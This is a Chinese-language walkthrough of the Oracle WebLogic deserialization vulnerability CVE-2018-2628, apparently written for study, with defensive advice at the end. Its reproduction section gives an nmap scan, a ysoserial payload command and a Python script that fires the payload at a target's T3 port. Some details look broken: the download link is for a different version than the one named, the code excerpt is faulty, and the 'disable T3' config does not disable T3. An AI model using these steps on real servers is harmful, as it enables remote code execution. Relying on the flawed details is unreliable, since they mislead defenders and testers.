怎么实现Weblogic反序列化漏洞CVE-2018-2628的分析

# 怎么实现Weblogic反序列化漏洞CVE-2018-2628的分析

## 一、漏洞概述

CVE-2018-2628是Oracle WebLogic Server中一个高危的Java反序列化漏洞，影响版本包括10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。该漏洞存在于WebLogic T3协议服务中，攻击者通过构造恶意序列化数据，可在目标服务器上实现远程代码执行（RCE）。

### 漏洞原理
漏洞核心在于WebLogic默认启用的T3协议对Java反序列化操作缺乏有效验证。当攻击者向T3服务端口（默认7001）发送精心构造的序列化对象时，可利用Apache Commons Collections库中的Transformer链（Gadget Chain）触发任意代码执行。

## 二、环境搭建

### 1. 实验环境要求
- 操作系统：Windows/Linux
- 漏洞版本：WebLogic 10.3.6.0
- JDK版本：1.6/1.7（需与WebLogic兼容）
- 工具准备：
  - ysoserial（生成Payload）
  - Wireshark（流量分析）
  - BurpSuite（请求构造）

### 2. 环境部署步骤
```bash
# 下载WebLogic 10.3.6安装包
wget https://download.oracle.com/otn/nt/middleware/12c/wls/1213/wls1213_dev.zip

# 安装后启动管理服务器
cd %DOMN_HOME%/bin
startWebLogic.cmd

三、漏洞复现分析

1. 漏洞验证流程

1. 使用nmap检测开放端口：

   
   nmap -sV -p 7001 192.168.1.100
   

2. 确认T3协议响应特征：

   
   t3 12.2.1\nAS:255\nHL:19\n\n
   

2. 构造恶意Payload

利用ysoserial生成CommonsCollections5的Gadget：

java -jar ysoserial.jar CommonsCollections5 "calc.exe" > payload.bin

3. 发送恶意请求

通过Python脚本发送构造的T3协议数据包：

import socket

def exploit(ip, port, payload):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    
    # 发送T3协议头
    handshake = "t3 12.2.1\nAS:255\nHL:19\n\n".encode()
    sock.sendall(handshake)
    
    # 发送恶意序列化数据
    sock.sendall(payload)
    sock.close()

with open("payload.bin", "rb") as f:
    exploit("192.168.1.100", 7001, f.read())

四、技术原理深度分析

1. 反序列化触发点

漏洞触发位于weblogic.rjvm.InboundMsgAbbrev类的readObject()方法：

public Object readObject() throws IOException {
    if (this.stream.available() > 0) {
        return this.readObjectInternal();
    }
}

2. Gadget Chain分析

完整的利用链如下：

ObjectInputStream.readObject()
  AnnotationInvocationHandler.readObject()
    Map(Proxy).entrySet()
      AnnotationInvocationHandler.invoke()
        LazyMap.get()
          ChainedTransformer.transform()
            InvokerTransformer.transform()
              Runtime.exec()

3. 关键类说明

• InvokerTransformer：通过反射调用任意方法
• ChainedTransformer：将多个Transformer串联执行
• LazyMap：延迟执行Transformer链

五、修复方案

1. 官方补丁措施

Oracle通过以下方式修复： - 增加T3协议的黑名单过滤 - 更新FilterInputStream的校验逻辑

2. 临时缓解方案

<!-- 关闭T3协议 -->
<security-configuration>
    <enforce-valid-t3-protocol>true</enforce-valid-t3-protocol>
</security-configuration>

六、防御建议

1. 网络层防护：

   • 限制T3协议端口的外部访问
   • 部署WAF规则过滤异常T3请求

2. 代码层防护：

   // 使用ObjectInputFilter验证反序列化
   ObjectInputStream ois = new ObjectInputStream(input);
   ois.setObjectInputFilter(filter);
   

3. 运维建议：

   • 定期更新WebLogic补丁
   • 监控反序列化操作日志

七、总结

CVE-2018-2628暴露了企业中间件在协议实现中的安全隐患。通过本文分析可以看出： 1. 反序列化漏洞的危害性极高 2. 协议级别的安全验证至关重要 3. 防御需要多层次防护体系

附录： - Oracle官方公告 - CVE详细记录 “`

注：实际测试时请确保在授权环境下进行，本文仅作技术研究用途。